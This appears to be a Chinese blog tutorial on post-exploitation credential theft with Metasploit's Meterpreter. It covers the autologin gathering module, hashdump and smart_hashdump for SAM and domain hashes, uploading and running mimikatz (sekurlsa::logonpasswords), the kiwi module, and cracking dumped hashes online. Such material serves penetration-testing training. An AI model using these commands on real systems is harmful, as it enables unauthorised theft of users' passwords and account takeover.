【工具使用】——MSF使用_使用MSF抓取用户密码

一、抓取自动登录的密码:

  很多用户习惯将计算机设置自动登录,可以使用run windows/gather/credentials/windows_autologin抓取自动登录的用户名和密码。
  点击进入:开启windows用户自动登陆的方法!

命令:

run windows/gather/credentials/windows_autologin

二、导出密码哈希:

1. run hashdump命令:

  hashdump模块可以从SAM数据库中导出本地用户账号,该命令的使用需要系统权限。

1、在meterpreter_shell中执行run hashdump命令:
命令:

run hashdump

用户哈希数据的输出格式为:

用户名:SID:LM哈希:NTLM哈希:::
2、上面我们得到了三个用户账号,分别为Administrator、Guest和test。

其中Guest的LM哈希aad3b435b51404eeaad3b435b51404ee)和NTLM哈希(31d6cfe0d16ae931b73c59d7e0c089c0)对应的是一个空密码:



3、可以看出,test和administrator用户两个密码一样(hash都是:0607f770c2f37e09a850e09e920a9f45),使用在线网站解密:进入cmd5解密网站

2. run windows/gather/smart_hashdump命令:

  run windows/gather/smart_hashdump命令的使用需要系统权限。该功能更强大,如果当前用户是域管理员用户,则可以导出域内所有用户的hash。

三、使用mimikatx抓取密码:

1. 上传mimikatz程序:

  我们还可以通过上传mimikatz程序,然后执行mimikatz程序来获取明文密码。

1.1 前提:

  执行mimikatz必须System权限,并且在执行时,要根据当前的系统位数进行选择。

1.2 使用方法:

1、在meterpreter_shell的命令行里面查看当前会话的权限,可以看出当前用会话system权限:

2、查看系统位数,可以看出当前系统位数为X64位:


3、选择x64位的mimikatz上传至目标服务器:
命令:

upload file  #upload命令后面需要跟上要上传文件的路径;这个命令是从当前机器上传到目标机器;

4、进入mimikatz的交互界面:
命令:

execute -i -f mimikatz.exe

5、在mimikatz交互界面,使用以下两条命令抓取密码:
命令:

privilege::debug
sekurlsa::logonpasswords

2. msf自带的kiwi模块抓取密码:

  在新的的msf中,里面集成的mimikatz模块已经被kiwi取代,已经无法直接加载mimikatz模块;我们需要加载kiwi模块,这样才能使用mimikatz;kiwi模块功能和mimikatz一样。
  加载kiwi模块,该模块的使用需要System权限。
  点击进入:MSF中kiwi模块的使用

  • 12
    点赞
  • 78
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值